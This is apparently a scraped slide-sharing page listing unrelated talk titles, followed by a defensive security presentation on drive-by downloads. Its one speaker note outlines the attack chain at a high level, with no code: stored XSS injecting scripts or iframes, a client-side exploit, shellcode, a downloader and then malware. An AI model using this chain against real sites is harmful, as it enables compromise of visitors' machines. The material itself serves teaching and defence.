Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 

Drive By Downloads: How To Avoid Getting a Cap Popped in Your App

Notas do Editor

  1. Use web application vulnerability (stored XSS) to inject legitimate web page with malicious code (e.g., JavaScript, IFRAME, etc)Invoke client-side vulnerability (e.g., IE zero-day, PDF exploit, etc) OR use social engineeringDeliver shellcode to take controlSend “downloader”Deliver malware of attackers choice